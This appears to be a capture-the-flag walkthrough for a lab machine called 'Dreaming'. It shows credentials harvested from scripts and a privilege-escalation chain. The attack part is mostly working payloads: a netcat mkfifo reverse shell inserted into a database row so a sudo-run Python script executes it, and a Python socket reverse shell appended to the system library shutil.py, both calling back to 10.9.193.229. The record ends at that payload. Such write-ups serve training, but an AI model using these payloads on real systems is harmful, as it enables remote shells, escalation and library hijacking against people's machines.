Dreaming

April 08, 2024

We can see here that port 3306 is running which is mysql database

Then after we viewed the "test.py" we can grab some credentials

login.php
lucien
HeyLucien#@1999!

mysql
DB_USER = "death"
DB_PASS = "#redacted"
DB_NAME = "library"

ssh lucien@IP
HeyLucien#@1999!

mysql -u lucien -p
lucien42DBPASSWORD

But remember that the code in the "getDreams.py" has a vulnerability that is doesn't filter out some key input that is malicious.

Now we will see again the contents of "dreams" table from the "library" database.

Thus conclude that we can insert the reverse shell into the database.

INSERT INTO dreams (dreamer, dream) VALUES ('<anything>', '<Reverse_shell>');

INSERT INTO dreams (dreamer, dream) VALUES ('tryingtobehacker', 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.193.229 4444 >/tmp/f');

As we run that command as user death it will excecute the reverse shell and we will receive the connection from it

sudo -u death /usr/bin/python3 /home/death/getDreams.py

As we navigate to morpheus user we can see "restore.py" which is a python script

As we go see the shutil.py from the directory /usr/lib/python3.8. We can see here that we can modify the shutil.py

cd /usr/lib/python3.8

This is the unedited shutil.py script

Now we will inject our reverse shell into the shutil.py

PS. Just press enter multiple times for us to insert our malicious code

import socket,subprocess,os;
import pty;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.9.193.229",5555));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")